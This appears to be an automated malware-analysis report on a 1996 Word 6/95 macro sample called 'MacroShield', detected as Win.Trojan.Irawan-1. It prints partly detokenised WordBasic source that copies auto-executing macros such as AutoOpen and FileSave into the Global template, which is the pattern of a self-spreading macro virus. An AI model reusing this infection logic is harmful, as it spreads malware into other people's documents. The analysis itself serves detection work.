MALICIOUS
102
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample exhibits legacy WordBasic macro virus markers and is explicitly detected by ClamAV as Win.Trojan.Irawan-1. The document body contains numerous references to 'RSN MACRO VIRUS' and 'MacroShield', indicating its purpose is related to macro virus functionality, likely for spreading or removal of other macros, but in this context, it is the malicious payload itself.
Heuristics 3
-
ClamAV: Win.Trojan.Irawan-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Irawan-1
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
Recovered legacy WordBasic macro source info OLE_LEGACY_WORDBASIC_MACRO_SOURCEThe Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
wordbasic_macros.txt |
wordbasic-macro | analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source) | 5190 bytes |
SHA-256: e4cb9a42306c261e81015f8d5410bb513e3b7aafe41b8cbc90a95bc4e5c9594c |
|||
Preview scriptFirst 1,000 lines of the extracted script
, = = = = 11876 11876 21349 21349 11876 21349 21349 11876 20325 8292
356 8292 @cmd6e75 REM menghapus makro yang diidentifik sebagai virus. (c) 1996 B. Irawa
MAIN
REM *********************************************************
REM * MacroShield, macro virus remover *
REM * Copyright (c) 1996 B. Irawan D *
REM * 3rd Beta Release in Dec, 9 1996 *
REM * Thanks to 1. 'Ci, you're my everything... *
REM * 2. Denny & Dhonny, thank's for your support *
REM * 3. All of my friend in OS III/96 *
REM * 4. All of my frien in STTTelkom '91 *
REM *********************************************************
"MacroShield, macro virus remover"
MAIN
, - * Dayeuhkolot
sMe$ = @cmd8025
sMacro$ = SMe$ = ":Autoexec"
@cmd80c2 sMacro$ , "Global:Autoexec"
sMacro$ = sMe$ = ":AutoOpen"
@cmd80c2 sMacro$ , "Global:AutoOpen"
sMacro$ = SMe$ = ":FileSave"
@cmd80c2 sMacro$ , "Global:FileSave"
sMacro$ = SMe$ = ":FileSaveAs"
@cmd80c2 sMacro$ , "Global:FileSaveAs"
sMacro$ = SMe$ = ":FileOpen"
@cmd80c2 sMacro$ , "Global:FileOpen"
sMacro$ = SMe$ = ":MacroShield"
@cmd80c2 sMacro$ , "Global:MacroShield" 29807
MAIN
MacroShield
MAIN
, - * STTTelkom
@cmd0053
dlg @cmd0054
dlg
dlg = 0 dlg = 1
@cmd0054 dlg
sMe$ = @cmd8025
sTMacro$ = sMe$ = ":AutoExec"
@cmd80c2 "Global:AutoExec" , sTMacro$
sTMacro$ = sMe$ = ":AutoOpen"
@cmd80c2 "Global:AutoOpen" , sTMacro$
sTMacro$ = sMe$ = ":FileSave"
@cmd80c2 "Global:FileSave" , sTMacro$
sTMacro$ = sMe$ = ":FileSaveAs"
@cmd80c2 "Global:FileSaveAs" , sTMacro$
sTMacro$ = SMe$ = ":FileOpen"
@cmd80c2 "Global:FileOpen" , STMacro$
sTMacro$ = SMe$ = ":MacroShield"
@cmd80c2 "Global:MacroShield" , STMacro$
* OSIII96 28523
Err 102
@cmd0054 dlg
=
MAIN
, - * STTTelkom
dlg @cmd0054
dlg
dlg
dlg = 0 dlg = 1
@cmd0054 dlg
sMe$ = @cmd8025
sTMacro$ = sMe$ = ":AutoExec"
@cmd80c2 "Global:AutoExec" , sTMacro$
sTMacro$ = sMe$ = ":AutoOpen"
@cmd80c2 "Global:AutoOpen" , sTMacro$
sTMacro$ = sMe$ = ":FileSave"
@cmd80c2 "Global:FileSave" , sTMacro$
sTMacro$ = sMe$ = ":FileSaveAs"
@cmd80c2 "Global:FileSaveAs" , sTMacro$
sTMacro$ = SMe$ = ":FileOpen"
@cmd80c2 "Global:FileOpen" , sTMacro$
sTMacro$ = SMe$ = ":MacroShield"
@cmd80c2 "Global:MacroShield" , STMacro$
* OSIII96 28523
Err 102
@cmd0054 dlg
=
REM *********************************************************
REM * MacroShield, macro virus remover *
REM * Copyright (c) 1996 B. Irawan D *
REM * 3rd Beta Release in Dec, 9 1996 *
REM * Thanks to 1. 'Ci, you're my everything... *
REM * 2. Denny & Dhonny, thank's for your support *
REM * 3. All of my friend in OS III/96 *
REM * 4. All of my friend in STTTelkom '91 *
REM *********************************************************
MAIN
multiFileMsg$ = "Anda tidak dapat membuka beberapa file bersamaan jika MacroShield terinstal. Yang pertama anda pilih akan dibuka."
spTitle$ = "MacroShield"
@cmd800f @cmd80b5 1 , "Macintosh" 0
wordVerCode = 0
@cmd800f @cmd80b5 1 , "Windows 3." 0
wordVerCode = 1
@cmd8008 @cmd80b5 2 , 1 = "6"
wordVerCode = 2
wordVerCode = 3
@cmd8111 0
@cmd809e
, - * ErrHandler
@cmd80d6 1
, - * 0
* StartOpen
29285
@cmd0209
@cmd80d6 1
Err = 0
dlg @cmd0050
dlg
file$ =
resp = dlg
resp = 0 wordVerCode 3 * EndFunc
fileList$ = Dlg
wordVerCode
1 REM WinWord 6
@cmd800f fileList$ , " " 0
separator = @cmd800f fileList$ , " "
fnameLen = separator 1
file$ = @cmd800a fileList$ , 1 , fnameLen
Dlg = file$
@cmd802b multiFileMsg$ , spTitle$ , 64
2 REM Winword NT
quotePos = @cmd800f 2 , fileList$ , @cmd8005 34
spacePos = @cmd800f fileList$ , " "
listLen = @cmd8003 fileList$
quotePos = 0 spacePos 0
fnameLen = spacePos 1
file$ = @cmd800a fileList$ , 1 , fnameLen
Dlg = file$
@cmd802b multiFileMsg$ , spTitle$ , 64
quotePos 0 quotePos listLen
fnameLen = quotePos
file$ = @cmd800a fileList$ , 1 , fnameLen
Dlg = file$
@cmd802b multiFileMsg$ , spTitle$ , 64
3 REM Winword 7
Resp = 0
@cmd8003 fileList$ 0
file$ = firstFile$ fileList$
Dlg = file$
@cmd802b multiFileMsg$ , spTitle$ , 64
* EndFunc
dlg = file$
dlg = 1
6501
, - * ErrHandler2
@cmd0050 dlg
, - * 0
* ScreenSwitch
29285
Err = 0
* EndFunc
=
file$ = @cmd8025
DlgFSA @cmd0054
DlgFSA
DlgFSA = 1 @cmd80b7 1 0 screenOpen file$
@cmd809e 0
, - * ErrHandler3
@cmd80d6 0
* EndFunc
29285
@cmd0209
@cmd80d6 0
Err = 0
=
screenOpen file$
autoopen$ = "autoopen"
HasAutoOpen = 0
MacroCount = @cmd80b7 1
i = 1 MacroCount
MacName$ = @cmd80b8 i , 1
@cmd80b0 MacName$ = autoopen$ HasAutoOpen = 1
i
OpenItClean file$ =
OpenItClean file$
@cmd80a0 2
, - * ErrHandler
@cmd004f = file$
, - * ErrHandler
@cmd0057 =
, - * 0
, - * ErrHandler2
@cmd8024
* EndFunc
29285
@cmd0209
@cmd0057 =
@cmd8024
Err = 0
29285
Err = 0 =
@cmd0054 = file$
firstFile$ FileList$
@cmd8008 FileList$ , 1 = @cmd8005 34
separator = @cmd800f 2 , FileList$ , @cmd8005 34
fnameLen = separator 2
firstFile$ = @cmd800a FileList$ , 2 , fnameLen
separator = @cmd800f FileList$ , " "
fnameLen = separator 1
firstFile$ = @cmd800a FileList$ , 1 , fnameLen
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.